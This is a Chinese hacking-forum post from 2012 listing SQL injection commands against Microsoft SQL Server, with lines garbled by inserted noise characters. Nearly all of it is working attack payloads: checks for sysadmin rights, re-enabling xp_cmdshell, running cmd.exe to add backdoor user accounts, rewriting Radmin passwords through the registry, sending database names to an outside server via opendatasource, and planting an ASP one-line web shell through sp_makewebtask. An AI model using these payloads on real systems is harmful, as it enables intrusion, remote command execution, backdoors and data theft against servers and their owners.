找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1976|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
9 n4 V( _) p  ]//看看是什么权限的, S4 |' Y0 p) G; r& T
and 1=(Select IS_MEMBER('db_owner'))7 b& [, i( ?# S. r6 Q
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
/ w; z! M5 U8 e+ z, J2 f; m7 n
; w  N# d0 B7 n8 a//检测是否有读取某数据库的权限9 i. \0 w" g: O- m$ [
and 1= (Select HAS_DBACCESS('master'))
& s  J* m8 U  Q. r+ z' ]7 {. r: B/ W" VAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --3 t. V( _3 R: J5 a  _; j! R

+ o2 u5 r! _1 n& d5 D8 p
, V- B# }. G) `0 F2 D( j3 M7 Y数字类型
, i3 w+ h7 ~* a7 q! n; X0 o! Land char(124)%2Buser%2Bchar(124)=0
1 z! y% T! ?" k5 z. b# |) ^
( A( y$ q& c2 h: F# J( [0 R* P字符类型$ J! |! ]1 ?; |' O# g1 _
' and char(124)%2Buser%2Bchar(124)=0 and ''='2 R4 U5 ]) C/ [9 |8 V
7 P8 ~; Q+ I2 k6 N9 g5 u, Z; o* j
搜索类型0 O, G. |: D: |) M4 T! A
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
7 V( I+ W' r& E4 [7 U6 D
: H0 _- I% D7 a2 z! A: T爆用户名
- d- R/ t4 D! b) K$ xand user>0
1 R+ f  p# r& Z" X3 @' and user>0 and ''='% N4 ]& E- ?& {4 J6 Y- @
, O+ f0 ^, w' a6 e6 ~( F
检测是否为SA权限
- s5 {( O- B; G( Tand 1=(select IS_SRVROLEMEMBER('sysadmin'));--, ?1 v. e! O  R4 u, Y1 N$ g
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
0 U9 o; `$ y& L4 i& @2 b* x2 ]
; U* d; n. n5 Z. T  n, Y3 N检测是不是MSSQL数据库
5 v* P9 ]  t) o. o3 B0 ^and exists (select * from sysobjects);--
* }* X7 |, {$ r, Y, }! O8 C5 j+ o( F  `8 b: `$ e' y" ]& f
检测是否支持多行: Q4 d& v# _9 K" f- J
;declare @d int;--
9 [  M7 F. N9 _$ F
$ M7 |: l5 Y8 g2 o' H6 c, I( D6 B/ ^3 f恢复 xp_cmdshell
# s3 x4 A$ d* d' ^3 k;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--+ H; f% @$ x9 k5 j2 F

( r* l. U. z5 H8 y7 z) n3 w) @5 \7 [  a8 O5 ^  I
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
( D$ ]% M) j6 y- S) p1 i' C% K1 M1 o1 _( ]6 p7 L$ {' T  w
//-----------------------8 Y; f# J, ^% {; R
//      执行命令
& w: w' e1 w2 I# a( y: i6 m8 V- Z( M//-----------------------
- y! i/ Z* H' y首先开启沙盘模式:
. E& H) V. t, y8 |( I, ^exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 A9 n, E5 J! H& ^
1 H1 ?* L( g+ r6 w' M  ?: T3 s' g& E然后利用jet.oledb执行系统命令! p7 F) V. m4 P8 I7 `1 v# d9 v
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')" U- p5 r/ z5 g$ ^. ~$ [

" F  y2 B: r. e; f1 @执行命令+ }' ?+ T9 z$ c! ~
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
. R+ a7 x( Z/ U6 L$ E1 w6 z$ j2 g
& ]5 n6 h8 ^3 k5 M; f8 W0 wEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 S" R$ F: b+ y4 ]: d+ N0 |. Z' m% [/ A4 M" w
判断xp_cmdshell扩展存储过程是否存在:( e1 N: F6 i4 s+ }! ~" s
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')/ A$ a% ~5 x% e5 Z/ ^% l/ N

% n8 t- ?- {6 L9 a( @% u% g/ d写注册表$ F* e9 G( t7 c" o  T! m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
" G8 T5 t% R  F: k5 Z8 C' m5 c5 d" G
REG_SZ4 J- W8 F* p* g' n& v

. G! |; C' K" n5 T9 ~' |读注册表
+ a; x' ~* o6 V) J# B' p6 ~exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit') F! r  X0 Q# [; k+ s
& W& k+ _# [9 J4 j, x1 d  }# B
读取目录内容
. p1 A: l- E8 _' q* Zexec master..xp_dirtree 'c:\winnt\system32\',1,1% l. c5 K  M) l4 Z: R9 I
7 }2 Q* ~# S' V- T6 f
: f4 B! X5 C  r) @6 t% s% r" ^
数据库备份
9 m! i" g2 a9 l  Zbackup database pubs to disk = 'c:\123.bak'% g2 {/ M# q* y' @# O

) U7 O: p$ I( X; d$ x//爆出长度
6 u; N$ u7 h: a6 N. {& ~* nAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
6 g: i6 D0 X( C+ f0 x0 E! o, ~+ d7 H' \2 S1 S

9 |4 i3 h4 F" v( w- [; z, a6 K' o4 _# [1 W9 c# O
更改sa口令方法:用sql综合利用工具连接后,执行命令:" Y6 b  @4 S! c/ T# l
exec sp_password NULL,'新密码','sa'; q- I4 w' ]/ c+ {8 v1 N  }
8 H+ }! G+ k1 F4 c5 |: v
添加和删除一个SA权限的用户test:
4 e4 `8 f7 Z# Y: M- H/ sexec master.dbo.sp_addlogin test,ptlove+ e) a+ a% Z; U
exec master.dbo.sp_addsrvrolemember test,sysadmin# ]( Z7 M  `, F/ ], Z
9 o' _$ V4 l# y  N& U( R) ]. E/ p; A
删除扩展存储过过程xp_cmdshell的语句:
6 [* U) V; M( i" P! {exec sp_dropextendedproc 'xp_cmdshell'$ i& [& m' _* K; p

" P+ F. F- t7 s添加扩展存储过过程
1 X# ]4 h* k+ \0 u3 I: pEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ( `  {. N" s2 J2 H& c
GRANT exec On xp_proxiedadata TO public
' t9 J1 C4 Y# |7 m9 ^+ y5 j) c2 }" L1 v9 ?3 _

7 ]6 w+ R, t; F. M* f停掉或激活某个服务。
8 e& l. T* Y( V. c7 @* ]7 Z! ^: T0 `' F
exec master..xp_servicecontrol 'stop','schedule'  w* T) p" R( p$ |& v8 i$ g$ {8 F
exec master..xp_servicecontrol 'start','schedule'- ~' `( N# r: k5 I, p

- y+ ?9 p5 @1 Xdbo.xp_subdirs
6 x) @/ X, R( ~0 M2 B( Z9 v9 x7 X& o' i# D
只列某个目录下的子目录。  g! t0 l( e6 B" p$ G
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
8 k0 W2 U% J1 p, V6 V% B( g2 O% _
dbo.xp_makecab4 L& f2 ~& Y% e
" h* [  B) P' r( K5 z
将目标多个档案压缩到某个目标档案之内。/ j) e5 G9 e  d$ o& m
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
$ }: L% ~- O( B; K7 Z' ~  l
9 y3 G! x2 F" Adbo.xp_makecab9 p5 M3 ]! X7 a+ M
'c:\test.cab','mszip',1,2 A) {1 ^! k* g0 v' a, t3 Y# k- \
'C:\Inetpub\wwwroot\SQLInject\login.asp',$ e* ~2 D' I  s3 _# v
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
; k: L7 z( m1 }$ l
+ b# [$ y7 P" gxp_terminate_process
. h3 g  V* P( T1 ~3 N
. P5 S. K( z1 h7 y停掉某个执行中的程序,但赋予的参数是 Process ID。
7 g; f0 Y2 M, V) u! p2 ]. d利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
3 |  Q# s/ U+ {
& [6 N" U4 u: o) b* y4 Ixp_terminate_process 2484
3 b) X$ g5 E# F/ W9 m. C
9 \; `0 y- S1 g# @# t# Q1 _& qxp_unpackcab
1 [9 V+ D4 n; y) v# v, i, O$ z
/ }3 w& W' w. u& _2 C. H$ m解开压缩档。" C1 g5 x6 j- ]2 S- q0 t6 w

2 o/ }- w/ Q. n3 \& Q* m. F8 S! d4 vxp_unpackcab 'c:\test.cab','c:\temp',1
: j9 t( b5 ~/ g1 B% h/ w  U9 b4 X0 c; _5 T

' s: b& {' X# T1 P, m8 y+ c某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12342 [! d8 X, r* B2 N; `

3 V6 U& E( y2 x6 |create database lcx;
0 G1 D  l" _1 n0 n3 mCreate TABLE ku(name nvarchar(256) null);
: h5 F3 J9 x- a: _$ p- z6 Y# CCreate TABLE biao(id int NULL,name nvarchar(256) null);" W; Y$ a8 S5 [/ ?& w( Q8 `

# n$ X3 x3 ^. J- e; y& r; N9 G//得到数据库名
" E' F8 v# Q  \2 y7 F) Cinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases7 Q+ ]# S" j8 L
) @# J$ D& q8 o/ W2 Z

5 ~+ ]6 N& t/ @- T4 n//在Master中创建表,看看权限怎样
; r4 b7 w8 H' i# N; g  VCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--% ]) [4 O5 A) W! H; I9 F  ~/ w  K2 ~
: K2 L; `* \% B. T
用 sp_makewebtask直接在web目录里写入一句话马:
; ^2 X# L1 s9 I/ s7 Ghttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--8 N! f0 ]% l% `% q2 p7 H: C0 J7 d

7 R3 {: H5 i9 }3 }7 _//更新表内容  ?8 q& k$ t5 ^) f/ u7 e
Update films SET kind = 'Dramatic' Where id = 123
; Q4 h: x: p* ^
3 m/ w9 X+ h  }  ?//删除内容
+ v6 D: F  `- \% ]delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表